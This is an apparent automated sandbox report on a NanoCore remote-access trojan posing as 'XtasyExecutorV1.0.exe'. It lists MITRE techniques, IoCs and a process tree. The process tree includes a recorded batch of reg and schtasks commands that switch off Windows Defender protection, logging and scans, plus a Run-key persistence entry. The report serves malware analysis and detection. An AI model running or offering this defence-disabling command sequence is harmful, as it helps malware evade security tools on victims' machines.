nanocore | hxxps://gofile[.]io/d/Dmq7NE

Analysis

max time kernel
130s
max time network
132s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
17-12-2024 20:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/Dmq7NE

Score

10^/10

nanocore defense_evasion discovery evasion keylogger persistence spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore
Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
4656	XtasyExecutorV1.0.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DSL Service = "C:\\Program Files (x86)\\DSL Service\\dslsv.exe"	XtasyExecutorV1.0.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	XtasyExecutorV1.0.exe

Modifies Security services 2 TTPs 4 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\DSL Service\dslsv.exe\:SmartScreen:$DATA	XtasyExecutorV1.0.exe
File created	C:\Program Files (x86)\DSL Service\dslsv.exe\:Zone.Identifier:$DATA	XtasyExecutorV1.0.exe
File created	C:\Program Files (x86)\DSL Service\dslsv.exe	XtasyExecutorV1.0.exe
File opened for modification	C:\Program Files (x86)\DSL Service\dslsv.exe	XtasyExecutorV1.0.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\XtasyExecutorV1.0.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XtasyExecutorV1.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

NTFS ADS 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 469788.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\XtasyExecutorV1.0.exe:Zone.Identifier	msedge.exe
File created	C:\Program Files (x86)\DSL Service\dslsv.exe\:SmartScreen:$DATA	XtasyExecutorV1.0.exe
File created	C:\Program Files (x86)\DSL Service\dslsv.exe\:Zone.Identifier:$DATA	XtasyExecutorV1.0.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

pid	Process
1856	msedge.exe
1856	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
3592	identity_helper.exe
3592	identity_helper.exe
684	msedge.exe
684	msedge.exe
4348	msedge.exe
4348	msedge.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
3804	msedge.exe
3804	msedge.exe
3804	msedge.exe
3804	msedge.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe
4656	XtasyExecutorV1.0.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4656	XtasyExecutorV1.0.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4656	XtasyExecutorV1.0.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2352 wrote to memory of 3816	2352	msedge.exe	78
PID 2352 wrote to memory of 3816	2352	msedge.exe	78
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 228	2352	msedge.exe	79
PID 2352 wrote to memory of 1856	2352	msedge.exe	80
PID 2352 wrote to memory of 1856	2352	msedge.exe	80
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81
PID 2352 wrote to memory of 1076	2352	msedge.exe	81

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/Dmq7NE
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb797b3cb8,0x7ffb797b3cc8,0x7ffb797b3cd8
  2⤵
  PID:3816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1868 /prefetch:2
  2⤵
  PID:228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2420 /prefetch:8
  2⤵
  PID:1076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1
  2⤵
  PID:2960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:2524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
  2⤵
  PID:2612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
  2⤵
  PID:396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
  2⤵
  PID:956
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
  2⤵
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
  2⤵
  PID:2108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:1264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6132 /prefetch:8
  2⤵
  PID:1020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1720,9950898581009995086,394385710340402108,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4792 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4348
- C:\Users\Admin\Downloads\XtasyExecutorV1.0.exe
  "C:\Users\Admin\Downloads\XtasyExecutorV1.0.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:4656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3eee8542.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3160
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1980
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4868
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4364
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4724
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4688
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:3092
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:1792
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:5016
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:3884
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:2148
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2500
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3416
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1476
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3372
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2716
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4676
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:3352
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:3548
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:2996
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
